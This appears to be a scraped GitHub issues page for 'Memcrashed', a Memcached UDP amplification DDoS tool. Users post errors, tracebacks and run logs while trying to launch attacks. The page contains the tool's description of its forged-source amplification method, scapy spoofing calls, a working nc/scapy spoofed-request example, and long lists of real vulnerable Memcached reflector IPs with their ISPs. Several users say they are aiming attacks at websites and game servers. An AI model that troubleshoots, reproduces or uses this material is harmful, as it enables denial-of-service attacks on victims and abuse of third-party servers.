649 / memcrashed-ddos-exploit Goto Github PK
View Code? Open in Web Editor NEWDDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API
DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API
On what Plattform? Windows ore Linux??
When Downloaded what Commands to Run?
I tryed Linux with this Commands:
git clone https://github.com/649/Memcrashed-DDoS-Exploit/
cd Desktop
cd Memcrashed-DDoS-Exploit
echo MyApiKey >api.txt
./Memcrashed.py
and then it says Access Denied then i tryed
Chmod +x Memcrashed.py
then i tryed again ./Memcrashed.py but then gives me some Errors
"@contextmanager: command not found" line 9
"syntaxt error near unexpected token (')" line10 "
def suppress_stout():'" line10
If anyone could help me
Python 3 is installed
shodan installed and getting the errors below
python3 Memcrashed.py
Traceback (most recent call last):
File "Memcrashed.py", line 2, in
import sys, os, time, shodan
ModuleNotFoundError: No module named 'shodan'
However i have just queried shodan via CLI with no issues
*] Use Shodan API to search for affected Memcached servers? <Y/n>: y
[] Checking Shodan.io API Key: key] Number of bots: 32961
[✓] API Key Authentication: SUCCESS [
[] Save results for later usage? <Y/n>: y [~] File written: ./bots.txt
[] Would you like to use locally stored Shodan data? <Y/n>: y
[▸] Enter target IP address: IP. [▸] Enter target port number (Default 80): 80
[▸] Enter preferred power (Default 1): 1
[+] Enter payload contained inside packet:
[] Would you like to display all the bots from Shodan? <Y/n>: n
[] Would you like to display all the bots stored locally? <Y/n>: n
[*] Ready to engage target IP? <Y/n>: y
[+] Sending 1 forged UDP packet to: 103.21.148.134 .[+] Sending 1 forged UDP packet to: 23.225.239.38
.[+] Sending 1 forged UDP packet to: 209.141.39.89 .[+] Sending 1 forged UDP packet to: 119.29.254.55
.[+] Sending 1 forged UDP packet to: 118.244.234.81.[+] Sending 1 forged UDP packet to: 193.109.144..........
Error
+] Sending 1 forged UDP packet to: 199.66.200.177.[+] Sending 1 forged UDP packet to: 116.228.231.107 .[+] Sending 1 forged UDP packet to: 2a02:c200:1:10:2:6:4103:1
Traceback (most recent call last): File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/fields.py", line 238, in h2i inet_aton(x) OSError: illegal IP address string passed to inet_aton
During handling of the above exception, another exception occurred:
Traceback (most recent call last): File "Memcrashed.py", line 135, in
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/base_classes.py", line 240, in call i.init(*args, **kargs)
File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/packet.py", line 134, in init
self.fields[f] = self.get_field(f).any2i(self, v)
es/scapy/packet.py", line 134, in init
self.fields[f] = self.get_field(f).any2i(self, v)
File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/fields.py", line 259, in any2i
return self.h2i(pkt,x) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/fields.py", line 240, in h2i x = Net(x)
File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/base_classes.py", line 90, in init self.parsed,self.netmask = self._parse_net(net)
File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/base_classes.py", line 83, in _parse_net tmp[0]=socket.gethostbyname(tmp[0])
socket.gaierror: [Errno -9] Address family for hostname not supported
Please help.
I just dunno how to fix this (
root@root:~/Memcrashed-DDos-Exploit# python3 Memcrashed.py
Bad key "lines.markerfacecolor" on line 11 in
/usr/share/matplotlib/mpl-data/stylelib/classic.mplstyle.
You probably need to get an updated matplotlibrc file from
http://github.com/matplotlib/matplotlib/blob/master/matplotlibrc.template
or from the matplotlib source distribution
Bad key "lines.markeredgecolor" on line 12 in
/usr/share/matplotlib/mpl-data/stylelib/classic.mplstyle.
You probably need to get an updated matplotlibrc file from
http://github.com/matplotlib/matplotlib/blob/master/matplotlibrc.template
or from the matplotlib source distribution
Created shodan account , did everything , when i put the api doesnt work.
Any fix?
im a newbie, and i cant get to know if the attack is succesfull. i gave in an ip and port with default payload but the website doesn't seem to be crashed
[+] Sending 2 forged synchronized payloads to: 103.254.14.199
Traceback (most recent call last):
File "Memcrashed.py", line 125, in
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1)
File "/usr/local/lib/python3.7/site-packages/scapy/sendrecv.py", line 316, in send
socket = socket or conf.L3socket(*args, **kargs)
File "/usr/local/lib/python3.7/site-packages/scapy/arch/bpf/supersocket.py", line 234, in init
super(L2bpfListenSocket, self).init(*args, **kwargs)
File "/usr/local/lib/python3.7/site-packages/scapy/arch/bpf/supersocket.py", line 57, in init
(self.ins, self.dev_bpf) = get_dev_bpf()
File "/usr/local/lib/python3.7/site-packages/scapy/arch/bpf/core.py", line 115, in get_dev_bpf
raise Scapy_Exception("No /dev/bpf handle is available !")
scapy.error.Scapy_Exception: No /dev/bpf handle is available !
Exception ignored in: <function _L2bpfSocket.del at 0x10fd2b7a0>
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/scapy/arch/bpf/supersocket.py", line 131, in del
self.close()
File "/usr/local/lib/python3.7/site-packages/scapy/arch/bpf/supersocket.py", line 203, in close
if not self.closed and self.ins is not None:
AttributeError: 'L3bpfSocket' object has no attribute 'ins'
pip install shadon
Collecting shadon
Could not find a version that satisfies the requirement shadon (from versions: )
No matching distribution found for shadon
?? can you help me ?
File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 240, in call
i.init(*args, **kargs)
File "/usr/lib/python3.6/site-packages/scapy/packet.py", line 134, in init
self.fields[f] = self.get_field(f).any2i(self, v)
File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 259, in any2i
return self.h2i(pkt,x)
File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 240, in h2i
x = Net(x)
File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 90, in init
self.parsed,self.netmask = self._parse_net(net)
File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 83, in _parse_net
tmp[0]=socket.gethostbyname(tmp[0])
socket.gaierror: [Errno -2] Name does not resolve
Traceback (most recent call last):
File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 238, in h2i
inet_aton(x)
OSError: illegal IP address string passed to inet_aton
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "Memcrashed.py", line 118, in
send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 240, in call
i.init(*args, **kargs)
File "/usr/lib/python3.6/site-packages/scapy/packet.py", line 134, in init
self.fields[f] = self.get_field(f).any2i(self, v)
File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 259, in any2i
return self.h2i(pkt,x)
File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 240, in h2i
x = Net(x)
File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 90, in init
self.parsed,self.netmask = self._parse_net(net)
File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 83, in _parse_net
tmp[0]=socket.gethostbyname(tmp[0])
socket.gaierror: [Errno -2] Name does not resolve
Help, what is that?
UnicodeEncodeError: 'ascii' codec can't decode characters in position 9-12 : ordinal not in range
python3 Memcrashed.py ->Traceback (most recent call last):
File "Memcrashed.py", line 5, in
from scapy.all import *
ModuleNotFoundError: No module named 'scapy' ->pip3 install scapy->ollecting scapy
Downloading scapy-2.3.3.tgz (1.4MB)
100% |████████████████████████████████| 1.4MB 529kB/s
Complete output from command python setup.py egg_info:
Traceback (most recent call last):
File "", line 1, in
File "/tmp/pip-build-6t71hxt_/scapy/setup.py", line 36
os.chmod(fname, 0755)
^
SyntaxError: invalid token
----------------------------------------
Command "python setup.py egg_info" failed with error code 1 in /tmp/pip-build-6t71hxt_/scapy/
As example, I tried to use the attack on my own IP with open port 11211, but it didn't worked at all. I have Shodan Membership and entered API key, running everything with Python 3 and have all the modules installed. What I have to do? Memcrashed doesn't shows any errors, but still doesn't have any effect.
root@d1amond:# cd Memcrashed-DDoS-Exploit//Memcrashed-DDoS-Exploit# python3.6 ./Memcrashed.py
root@d1amond:
Traceback (most recent call last):
File "./Memcrashed.py", line 5, in <module>
from scapy.all import *
ModuleNotFoundError: No module named 'scapy.all'
root@d1amond:~/Memcrashed-DDoS-Exploit# pip install scapy
Requirement already satisfied: scapy in /usr/local/lib/python2.7/dist-packages/scapy-2.4.2.dev12-py2.7.egg
I got this error:
Traceback (most recent call last):
File "Memcrashed.py", line 112, in
for x in ip_array:
NameError: name "ip_array" is not defined
is it try to DDOS That ip Address we enter on Target ? or it DDOS Vulnerable Memcrashed Servers ?
no packet sending
and if you wait a little, the Exiting Platform writes. Have a wonderful day.
I am a Chinese user. When I use the software, I cannot attack traffic. Other functions are normal. What is the problem? --translation software
Hi my friend! Prompt please. This script will work if the proxy suppresses the IP substitution. When I try to send a packet with the changed IP. he does not reach the addressee. Met with this problem?
python 3.x required
then you say pip install scapy
meanwhile python 2 is better nerd its supposed to be
pip install scapy-python3
jeez
socket.gaierror: [Errno 11001] getaddrinfo failed . What should I do?
On Kali Linux (all dependencies installed):
File "Memcrashed.py", line 25
SyntaxError: Non-ASCII character '\xe2' in file Memcrashed.py on line
26, but no encoding declared; see http://python.org/dev/peps/pep-0263/
for details
Solved adding at beginning of file:
-- coding: utf8 --
So, tried to DDoSe a target and nothing, so i search a lil more and there are comments that Memcrashed doesn't work anymore, so, what's the truth?
how do i start it
Traceback (most recent call last):
File "Memcrashed.py", line 139, in
print('[+] Sending 2 forged synchronized payloads to: %s' % (i))
NameError: name 'i' is not defined
Traceback (most recent call last):
File "memcrashed.py", line 63, in
query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>: ").lower()
File "", line 1, in
NameError: name 'y' is not defined
Hey , on the following moment for some reason I am not able to use my Shodan API key for Memcrashed. I have a bunch of questions. First of all , are you supposed to have upgraded account in order to use Memcrashed or both of them are fine. And when you are entering your API is it ok if it includes spaces ?
Also , It;s kind of strange , in my Memcrashed directory i've created a file called bots.txt , and it includes arround 17000 ip addresses, and it says that bots.txt not found.
Output:
`/Memcrashed-DDoS-Exploit$ ls/Memcrashed-DDoS-Exploit$ sudo docker run -it memcrashed
1.png 2.png 3.png 4.png api.txt bots.txt Dockerfile Memcrashed.py README.md requirements.txt
:
[sudo] password for :
███╗ ███╗███████╗███╗ ███╗ ██████╗██████╗ █████╗ ███████╗██╗ ██╗███████╗██████╗
████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║ ██║██╔════╝██╔══██╗
██╔████╔██║█████╗ ██╔████╔██║██║ ██████╔╝███████║███████╗███████║█████╗ ██║ ██║
██║╚██╔╝██║██╔══╝ ██║╚██╔╝██║██║ ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝ ██║ ██║
██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║ ██║██║ ██║███████║██║ ██║███████╗██████╔╝
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚═════╝
Author: @037
Version: 4.0
####################################### DISCLAIMER ########################################
| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable |
| memcached servers. It then allows you to use the same servers to launch widespread |
| distributed denial of service attacks by forging UDP packets sourced to your victim. |
| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |
| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly. |
| I am NOT responsible for any damages caused or any crimes committed by using this tool. |
###########################################################################################
[*] Please enter a valid Shodan.io API Key:
[~] File written: ./api.txt
[*] Use Shodan API to search for affected Memcached servers? <Y/n>: y
[] Checking Shodan.io API Key:] File written: ./api.txt
[✘] Error: Please upgrade your API plan to use filters or paging.
[] Would you like to change API Key? <Y/n>: y
[] Please enter valid Shodan.io API Key:
[
[~] Restarting Platform! Please wait.
[] Use Shodan API to search for affected Memcached servers? <Y/n>: n
[] Would you like to use locally stored Shodan data? <Y/n>: y
[✘] Error: No bots stored locally, bots.txt file not found!
`
I have an error "No information available for that IP". Im using my file bots.txt and not upgraded shodan api
ImportError: cannot import name redirect_stdout
Hello, I am doing a test to simulate memcache ddos.
I installed memcache 1.5.4 in kali os through apt
command, and the memcache is listening 127.0.0.1:11211
First, I set a key set a 0 0 abcdef
, and get it by get a
through telnet. It works as plan.
then I use python -c "print '\0\0\0\0\0\x01\0\0get a a a a a\r\n'" | nc -nvvu 127.0.0.1 11211 > /dev/null
to simulate amplification attack, and use wireshark to capture all interfaces without setting any filter. I can see what is going on. And it works as plan too. I can see the large package returned by port 11211
But when I change the source ip address by send(IP(src='a public ip address') / UDP(dport=11211) / Raw(load='\x00\x00\x00\x00\x00\x01\x00\x00get a a a a a\r\n'), count=1)
I can not see any response packages from port 11211, but just one package that I sent. It seems like memcache didn't response to the UDP get
command.
Then I test:
send(IP() / UDP(dport=11211) / Raw(load='\x00\x00\x00\x00\x00\x01\x00\x00get a a a a a\r\n'), count=1)
I still can not see any response packages from port 11211.
Can you help me ? Thanks very much!
Error: Request rate limit reached (1 request/ second). Please wait a second before trying again and slow down your API calls.
When start sending packets
mac os 10.13.2
How to check whether it goes ddos? I tried to enter ip more sites, servers of various games, but nothing happens. How can I check if a ddos attack is at all?
Traceback (most recent call last):
File "C:\Python36\lib\site-packages\scapy-2.4.0rc5-py3.6.egg\scapy\fields.py", line 238, in h2i
inet_aton(x)
OSError: illegal IP address string passed to inet_aton
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\Users\msfde\Desktop\Memcrashed-DDoS-Exploit-master\Memcrashed.py", line 121, in
with suppress_stdout():
File "C:\Python36\lib\site-packages\scapy-2.4.0rc5-py3.6.egg\scapy\base_classes.py", line 240, in call
i.init(*args, **kargs)
File "C:\Python36\lib\site-packages\scapy-2.4.0rc5-py3.6.egg\scapy\packet.py", line 134, in init
self.fields[f] = self.get_field(f).any2i(self, v)
File "C:\Python36\lib\site-packages\scapy-2.4.0rc5-py3.6.egg\scapy\fields.py", line 259, in any2i
return self.h2i(pkt,x)
File "C:\Python36\lib\site-packages\scapy-2.4.0rc5-py3.6.egg\scapy\fields.py", line 240, in h2i
x = Net(x)
File "C:\Python36\lib\site-packages\scapy-2.4.0rc5-py3.6.egg\scapy\base_classes.py", line 90, in init
self.parsed,self.netmask = self._parse_net(net)
File "C:\Python36\lib\site-packages\scapy-2.4.0rc5-py3.6.egg\scapy\base_classes.py", line 83, in _parse_net
tmp[0]=socket.gethostbyname(tmp[0])
socket.gaierror: [Errno 11001] getaddrinfo failed
Traceback (most recent call last):
File "Memcrashed.py", line 125, in
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1)
File "/home/admin/.local/lib/python3.6/site-packages/scapy/sendrecv.py", line 289, in send
socket = conf.L3socket(*args, **kargs)
File "/home/admin/.local/lib/python3.6/site-packages/scapy/arch/linux.py", line 407, in init
self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
File "/usr/lib/python3.6/socket.py", line 144, in init
_socket.socket.init(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol
Traceback (most recent call last):
File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 238, in h2i
inet_aton(x)
OSError: illegal IP address string passed to inet_aton
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "Memcrashed.py", line 122, in <module>
send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=p ower)
File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 240, in __ call__
i.__init__(*args, **kargs)
File "/usr/lib/python3.6/site-packages/scapy/packet.py", line 134, in __init__
self.fields[f] = self.get_field(f).any2i(self, v)
File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 259, in any2i
return self.h2i(pkt,x)
File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 240, in h2i
x = Net(x)
File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 90, in __i nit__
self.parsed,self.netmask = self._parse_net(net)
File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 83, in _pa rse_net
tmp[0]=socket.gethostbyname(tmp[0])
socket.gaierror: [Errno -2] Name does not resolve
File "Memcrashed.py", line 25
SyntaxError: Non-ASCII character '\xe2' in file Memcrashed.py on line 26, but no encoding declared; see http://python.org/dev/peps/pep-0263/ for details
i can not know this, why only 100 requests ?
[*] Please enter a valid Shodan.io API Key: *********************
[~] File written: ./api.txt
[*] Use Shodan API to search for affected Memcached servers? <Y/n>: y
[] Checking Shodan.io API Key: ******************
[✓] API Key Authentication: SUCCESS
[] Number of bots: 61435
[*] Save results for later usage? <Y/n>: y
[~] File written: ./bots.txt
[*] Would you like to use locally stored Shodan data? <Y/n>: y
[▸] Enter target IP address: *********
[▸] Enter preferred power (Default 1): 1
[▸] Enter payload contained inside packet: 10
[*] Would you like to display all the bots from Shodan? <Y/n>: y
[+] Memcache Server (1) | IP: 185.58.205.218 | OS: None | ISP: MAROSNET Telecommunication Company LLC |
[+] Memcache Server (2) | IP: 114.215.198.32 | OS: None | ISP: Aliyun Computing Co. |
[+] Memcache Server (3) | IP: 79.98.30.159 | OS: None | ISP: UAB Interneto vizija |
[+] Memcache Server (4) | IP: 198.11.234.98 | OS: None | ISP: SoftLayer Technologies |
[+] Memcache Server (5) | IP: 51.254.93.89 | OS: None | ISP: OVH SAS |
[+] Memcache Server (6) | IP: 69.50.212.204 | OS: None | ISP: CrystalTech Web Hosting |
[+] Memcache Server (7) | IP: 43.225.158.248 | OS: None | ISP: hongkong kwaifong information service limited |
[+] Memcache Server (8) | IP: 23.225.113.65 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (9) | IP: 23.244.241.178 | OS: Windows 7 or 8 | ISP: Enzu |
[+] Memcache Server (10) | IP: 61.147.124.51 | OS: None | ISP: China Telecom jiangsu |
[+] Memcache Server (11) | IP: 109.235.252.151 | OS: None | ISP: Dgn Teknoloji A.s. |
[+] Memcache Server (12) | IP: 147.52.110.5 | OS: None | ISP: University of Crete |
[+] Memcache Server (13) | IP: 77.75.124.183 | OS: None | ISP: UK Dedicated Servers Limited |
[+] Memcache Server (14) | IP: 164.58.48.5 | OS: None | ISP: Oklahoma State Regents for Higher Education |
[+] Memcache Server (15) | IP: 54.37.242.70 | OS: None | ISP: OVH SAS |
[+] Memcache Server (16) | IP: 123.30.157.244 | OS: None | ISP: Vietnam Posts and Telecommunications(VNPT) |
[+] Memcache Server (17) | IP: 42.121.236.117 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (18) | IP: 139.199.184.33 | OS: None | ISP: Tencent cloud computing |
[+] Memcache Server (19) | IP: 216.98.10.213 | OS: None | ISP: Atlantic.Net - New York, NY |
[+] Memcache Server (20) | IP: 185.174.28.89 | OS: None | ISP: Corelux Internet ve Yazilim Hizmetleri Ticaret Lim |
[+] Memcache Server (21) | IP: 47.75.48.225 | OS: None | ISP: Alibaba |
[+] Memcache Server (22) | IP: 123.30.191.42 | OS: None | ISP: Vietnam Posts and Telecommunications(VNPT) |
[+] Memcache Server (23) | IP: 91.224.140.37 | OS: None | ISP: Innovation IT Solutions LTD |
[+] Memcache Server (24) | IP: 149.56.165.165 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (25) | IP: 119.38.160.30 | OS: None | ISP: FoShan RuiJiang Science and Tech |
[+] Memcache Server (26) | IP: 123.30.139.46 | OS: None | ISP: Vietnam Posts and Telecommunications (VNPT) |
[+] Memcache Server (27) | IP: 123.31.43.241 | OS: None | ISP: Vietnam Posts and Telecommunications(VNPT) |
[+] Memcache Server (28) | IP: 119.23.21.215 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (29) | IP: 115.29.160.192 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (30) | IP: 149.202.44.25 | OS: None | ISP: OVH SAS |
[+] Memcache Server (31) | IP: 203.122.25.59 | OS: None | ISP: Citycom Networks Pvt |
[+] Memcache Server (32) | IP: 195.161.62.194 | OS: None | ISP: Avguro Technologies Ltd. Hosting service provider |
[+] Memcache Server (33) | IP: 185.12.124.76 | OS: None | ISP: QWARTA LLC |
[+] Memcache Server (34) | IP: 173.212.245.117 | OS: None | ISP: Contabo GmbH |
[+] Memcache Server (35) | IP: 1.60.17.28 | OS: None | ISP: China Unicom Heilongjiang |
[+] Memcache Server (36) | IP: 103.27.237.107 | OS: None | ISP: Long Van System Solution JSC |
[+] Memcache Server (37) | IP: 203.172.121.141 | OS: None | ISP: CS LoxInfo |
[+] Memcache Server (38) | IP: 134.213.30.27 | OS: None | ISP: Rackspace Ltd. |
[+] Memcache Server (39) | IP: 158.69.36.2 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (40) | IP: 72.14.186.34 | OS: None | ISP: Linode |
[+] Memcache Server (41) | IP: 5.39.57.88 | OS: None | ISP: OVH Hosting Limited |
[+] Memcache Server (42) | IP: 81.169.215.229 | OS: None | ISP: Strato AG |
[+] Memcache Server (43) | IP: 209.236.126.69 | OS: None | ISP: PrivateSystems Networks |
[+] Memcache Server (44) | IP: 192.99.25.230 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (45) | IP: 125.34.67.139 | OS: None | ISP: China Unicom Beijing |
[+] Memcache Server (46) | IP: 103.45.13.162 | OS: None | ISP: Shenzhen Qianhai bird cloud computing Co. |
[+] Memcache Server (47) | IP: 23.244.241.138 | OS: None | ISP: Enzu |
[+] Memcache Server (48) | IP: 62.176.2.210 | OS: None | ISP: Rial Com JSC |
[+] Memcache Server (49) | IP: 66.70.223.64 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (50) | IP: 61.9.48.146 | OS: None | ISP: SKYBroadband SKYCable Corporation |
[+] Memcache Server (51) | IP: 37.56.90.63 | OS: None | ISP: SaudiNet |
[+] Memcache Server (52) | IP: 108.61.246.84 | OS: None | ISP: Choopa, LLC |
[+] Memcache Server (53) | IP: 23.225.95.252 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (54) | IP: 207.210.68.42 | OS: None | ISP: Global Net Access, LLC |
[+] Memcache Server (55) | IP: 47.88.104.228 | OS: None | ISP: Alibaba |
[+] Memcache Server (56) | IP: 117.54.238.221 | OS: None | ISP: INDO Internet, PT |
[+] Memcache Server (57) | IP: 23.225.95.36 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (58) | IP: 172.247.51.143 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (59) | IP: 139.196.239.43 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (60) | IP: 173.201.27.39 | OS: None | ISP: GoDaddy.com, LLC |
[+] Memcache Server (61) | IP: 54.248.233.245 | OS: None | ISP: Amazon.com |
[+] Memcache Server (62) | IP: 123.30.128.176 | OS: None | ISP: Vietnam Posts and Telecommunications (VNPT) |
[+] Memcache Server (63) | IP: 133.242.185.90 | OS: None | ISP: SAKURA Internet |
[+] Memcache Server (64) | IP: 113.120.61.246 | OS: None | ISP: China Telecom Shandong |
[+] Memcache Server (65) | IP: 114.7.34.18 | OS: None | ISP: PT Indosat Tbk. |
[+] Memcache Server (66) | IP: 117.103.206.12 | OS: None | ISP: VTC Multimedia Corporation |
[+] Memcache Server (67) | IP: 213.251.187.75 | OS: None | ISP: OVH SAS |
[+] Memcache Server (68) | IP: 220.164.24.38 | OS: None | ISP: China Telecom Yunnan |
[+] Memcache Server (69) | IP: 123.30.128.187 | OS: None | ISP: Vietnam Posts and Telecommunications (VNPT) |
[+] Memcache Server (70) | IP: 172.247.51.58 | OS: Windows 7 or 8 | ISP: CloudRadium L.L.C |
[+] Memcache Server (71) | IP: 151.80.151.179 | OS: None | ISP: OVH SAS |
[+] Memcache Server (72) | IP: 153.122.27.24 | OS: None | ISP: Gmo Cloud K.k. |
[+] Memcache Server (73) | IP: 185.140.12.200 | OS: None | ISP: Majd Ngn Ict Development Pjsc |
[+] Memcache Server (74) | IP: 45.77.44.172 | OS: None | ISP: Choopa, LLC |
[+] Memcache Server (75) | IP: 112.137.167.32 | OS: None | ISP: TM-VADS DC Hosting |
[+] Memcache Server (76) | IP: 118.139.178.110 | OS: None | ISP: Virtual Private Hosting Service |
[+] Memcache Server (77) | IP: 109.123.155.96 | OS: None | ISP: Tomsk Polytechnic University |
[+] Memcache Server (78) | IP: 128.101.122.229 | OS: None | ISP: University of Minnesota |
[+] Memcache Server (79) | IP: 69.64.83.135 | OS: None | ISP: Codero |
[+] Memcache Server (80) | IP: 198.23.171.155 | OS: None | ISP: ColoCrossing |
[+] Memcache Server (81) | IP: 54.210.138.147 | OS: None | ISP: Amazon.com |
[+] Memcache Server (82) | IP: 95.158.131.144 | OS: None | ISP: Novatel LTD. |
[+] Memcache Server (83) | IP: 222.216.1.66 | OS: None | ISP: China Telecom Guangxi |
[+] Memcache Server (84) | IP: 181.112.145.251 | OS: None | ISP: Corporacion Nacional De Telecomunicaciones - Cnt E |
[+] Memcache Server (85) | IP: 118.31.71.231 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (86) | IP: 176.53.20.46 | OS: None | ISP: Radore Veri Merkezi Hizmetleri A.S. |
[+] Memcache Server (87) | IP: 111.231.110.149 | OS: None | ISP: Tencent cloud computing |
[+] Memcache Server (88) | IP: 89.175.27.177 | OS: None | ISP: MTS PJSC |
[+] Memcache Server (89) | IP: 198.50.191.110 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (90) | IP: 172.247.51.145 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (91) | IP: 211.149.200.233 | OS: None | ISP: Chengdu West Dimension Digital Technology Co. |
[+] Memcache Server (92) | IP: 182.253.226.85 | OS: None | ISP: Biznet Networks |
[+] Memcache Server (93) | IP: 176.31.147.158 | OS: None | ISP: OVH SAS |
[+] Memcache Server (94) | IP: 112.4.90.134 | OS: None | ISP: China Mobile |
[+] Memcache Server (95) | IP: 112.124.125.107 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (96) | IP: 77.81.164.139 | OS: None | ISP: Voxility S.R.L. |
[+] Memcache Server (97) | IP: 69.175.18.42 | OS: None | ISP: SingleHop |
[+] Memcache Server (98) | IP: 45.77.221.32 | OS: None | ISP: Choopa, LLC |
[+] Memcache Server (99) | IP: 123.31.19.98 | OS: None | ISP: Vietnam Posts and Telecommunications(VNPT) |
[+] Memcache Server (100) | IP: 50.97.148.126 | OS: None | ISP: SoftLayer Technologies |
[*] Would you like to display all the bots stored locally? <Y/n>: y
[+] Memcache Server (1) | IP: 185.58.205.218 | OS: None | ISP: MAROSNET Telecommunication Company LLC |
[+] Memcache Server (2) | IP: 114.215.198.32 | OS: None | ISP: Aliyun Computing Co. |
[+] Memcache Server (3) | IP: 79.98.30.159 | OS: None | ISP: UAB Interneto vizija |
[+] Memcache Server (4) | IP: 198.11.234.98 | OS: None | ISP: SoftLayer Technologies |
[+] Memcache Server (5) | IP: 51.254.93.89 | OS: None | ISP: OVH SAS |
[+] Memcache Server (6) | IP: 69.50.212.204 | OS: None | ISP: CrystalTech Web Hosting |
[+] Memcache Server (7) | IP: 43.225.158.248 | OS: None | ISP: hongkong kwaifong information service limited |
[+] Memcache Server (8) | IP: 23.225.113.65 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (9) | IP: 23.244.241.178 | OS: Windows 7 or 8 | ISP: Enzu |
[+] Memcache Server (10) | IP: 61.147.124.51 | OS: None | ISP: China Telecom jiangsu |
[+] Memcache Server (11) | IP: 109.235.252.151 | OS: None | ISP: Dgn Teknoloji A.s. |
[+] Memcache Server (12) | IP: 147.52.110.5 | OS: None | ISP: University of Crete |
[+] Memcache Server (13) | IP: 77.75.124.183 | OS: None | ISP: UK Dedicated Servers Limited |
[+] Memcache Server (14) | IP: 164.58.48.5 | OS: None | ISP: Oklahoma State Regents for Higher Education |
[+] Memcache Server (15) | IP: 54.37.242.70 | OS: None | ISP: OVH SAS |
[+] Memcache Server (16) | IP: 123.30.157.244 | OS: None | ISP: Vietnam Posts and Telecommunications(VNPT) |
[+] Memcache Server (17) | IP: 42.121.236.117 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (18) | IP: 139.199.184.33 | OS: None | ISP: Tencent cloud computing |
[+] Memcache Server (19) | IP: 216.98.10.213 | OS: None | ISP: Atlantic.Net - New York, NY |
[+] Memcache Server (20) | IP: 185.174.28.89 | OS: None | ISP: Corelux Internet ve Yazilim Hizmetleri Ticaret Lim |
[+] Memcache Server (21) | IP: 47.75.48.225 | OS: None | ISP: Alibaba |
[+] Memcache Server (22) | IP: 123.30.191.42 | OS: None | ISP: Vietnam Posts and Telecommunications(VNPT) |
[+] Memcache Server (23) | IP: 91.224.140.37 | OS: None | ISP: Innovation IT Solutions LTD |
[+] Memcache Server (24) | IP: 149.56.165.165 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (25) | IP: 119.38.160.30 | OS: None | ISP: FoShan RuiJiang Science and Tech |
[+] Memcache Server (26) | IP: 123.30.139.46 | OS: None | ISP: Vietnam Posts and Telecommunications (VNPT) |
[+] Memcache Server (27) | IP: 123.31.43.241 | OS: None | ISP: Vietnam Posts and Telecommunications(VNPT) |
[+] Memcache Server (28) | IP: 119.23.21.215 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (29) | IP: 115.29.160.192 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
